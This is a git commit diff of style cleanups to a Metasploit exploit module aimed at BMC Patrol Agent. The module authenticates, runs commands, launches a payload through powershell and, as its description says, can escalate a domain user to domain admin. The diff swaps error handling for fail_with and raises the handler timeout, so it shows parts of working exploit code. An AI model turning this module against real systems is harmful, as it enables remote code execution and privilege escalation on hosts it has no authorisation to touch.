Style police :P
parent
b55fdc7323
commit
e716c24f2d
|
@ -144,7 +144,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
of the provided user is correct. This also means if the software is running on a
|
||||
domain controller, it can be used to escalate from a normal domain user to domain
|
||||
admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses
|
||||
powershell to execute the payload.
|
||||
powershell to execute the payload. The powershell version tends to timeout on
|
||||
the first run so it may take multiple tries.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -189,6 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def cleanup
|
||||
disconnect
|
||||
print_status("Disconnected from BMC Patrol Agent.")
|
||||
@inflater.close
|
||||
@deflater.close
|
||||
super
|
||||
|
@ -196,10 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def get_target_os( srv_info_msg )
|
||||
lines = srv_info_msg.split("\n")
|
||||
if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}"
|
||||
print_error("Invalid server info msg.")
|
||||
return
|
||||
end
|
||||
fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}"
|
||||
|
||||
os = $nil
|
||||
ver = $nil
|
||||
|
@ -213,23 +212,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
end
|
||||
return [os,ver]
|
||||
[os,ver]
|
||||
end
|
||||
|
||||
def get_cmd_output( cmd_output_msg )
|
||||
|
||||
lines = cmd_output_msg.split("\n")
|
||||
if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}"
|
||||
print_error("Invalid command output msg.")
|
||||
return
|
||||
end
|
||||
fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}"
|
||||
|
||||
#Parse out command results
|
||||
idx_start = cmd_output_msg.index("Result\x00")
|
||||
idx_end = cmd_output_msg.index("RemPsl_user")
|
||||
output = cmd_output_msg[idx_start+7..idx_end-1]
|
||||
|
||||
return output
|
||||
output
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -243,13 +239,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
#Configure the payload handler
|
||||
payload_instance.exploit_config = {
|
||||
'active_timeout' => 180
|
||||
'active_timeout' => 300
|
||||
}
|
||||
# Set up the payload handlers
|
||||
#Setup the payload handler
|
||||
payload_instance.setup_handler
|
||||
|
||||
# Start the payload handler
|
||||
#Start the payload handler
|
||||
payload_instance.start_handler
|
||||
|
||||
end
|
||||
|
||||
#Initialize zlib objects
|
||||
|
@ -263,45 +260,29 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
#Create session msg
|
||||
create_session
|
||||
ret_data = receive_msg
|
||||
if ret_data == $nil
|
||||
print_error("Failed to receive session confirmation. Aborting.")
|
||||
return
|
||||
end
|
||||
ret_len = ret_data.length
|
||||
fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data == $nil
|
||||
|
||||
#Authenticate
|
||||
authenticate_user(datastore['USER'], datastore['PASSWORD'])
|
||||
|
||||
#receive the authentication response
|
||||
ret_data = receive_msg()
|
||||
if ret_data == $nil
|
||||
print_error("Failed to receive authentication response. Aborting.")
|
||||
return
|
||||
end
|
||||
ret_data = receive_msg
|
||||
fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data == $nil
|
||||
|
||||
ret_msg = process_response( ret_data )
|
||||
ret_msg = process_response(ret_data)
|
||||
if ret_msg =~ /logged in/
|
||||
print_status("Successfully authenticated user.")
|
||||
else
|
||||
print_error("Login failed. Aborting.")
|
||||
return
|
||||
fail_with(Failure::UnexpectedReply, "Login failed. Aborting.")
|
||||
end
|
||||
|
||||
|
||||
#receive the server info
|
||||
ret_data = receive_msg()
|
||||
if ret_data == $nil
|
||||
print_error("Failed to receive server info msg. Aborting.")
|
||||
return
|
||||
end
|
||||
srv_info = process_response( ret_data )
|
||||
ret_data = receive_msg
|
||||
fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data == $nil
|
||||
srv_info = process_response(ret_data)
|
||||
|
||||
#Get the target's OS from their info msg
|
||||
target_os = get_target_os(srv_info)
|
||||
if target_os == $nil
|
||||
print_error("Invalid server info msg. Aborting.")
|
||||
return
|
||||
end
|
||||
|
||||
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
|
||||
# Fail if this is the case and ask the user to select an appropriate payload.
|
||||
|
@ -324,27 +305,25 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
run_cmd(command)
|
||||
|
||||
#receive command confirmation
|
||||
ret_data = receive_msg()
|
||||
ret_data = receive_msg
|
||||
if ret_data != $nil
|
||||
process_response( ret_data )
|
||||
process_response(ret_data)
|
||||
end
|
||||
|
||||
#receive command output
|
||||
ret_data = receive_msg()
|
||||
ret_data = receive_msg
|
||||
if ret_data != $nil and datastore['CMD'] != $nil
|
||||
cmd_result_data = process_response( ret_data )
|
||||
cmd_result = get_cmd_output(cmd_result_data)
|
||||
if cmd_result != $nil
|
||||
print_status( "Output:\n#{cmd_result}" )
|
||||
end
|
||||
end
|
||||
|
||||
#Handle the shell
|
||||
handler
|
||||
|
||||
end
|
||||
|
||||
def receive_msg()
|
||||
def receive_msg
|
||||
|
||||
header = sock.get_once(6)
|
||||
if header == $nil
|
||||
|
@ -367,7 +346,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def send_msg(type, compression, data)
|
||||
|
||||
ret_len = 0
|
||||
data_len = data.length
|
||||
buf = [data_len].pack('N')
|
||||
|
||||
|
@ -1078,7 +1056,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def des_string_to_key( key_buf_str )
|
||||
|
||||
init_des()
|
||||
init_des
|
||||
temp_key1 = Array.new(8,0)
|
||||
temp_key2 = Array.new(8,0)
|
||||
|
||||
|
|
Loading…
Reference in New Issue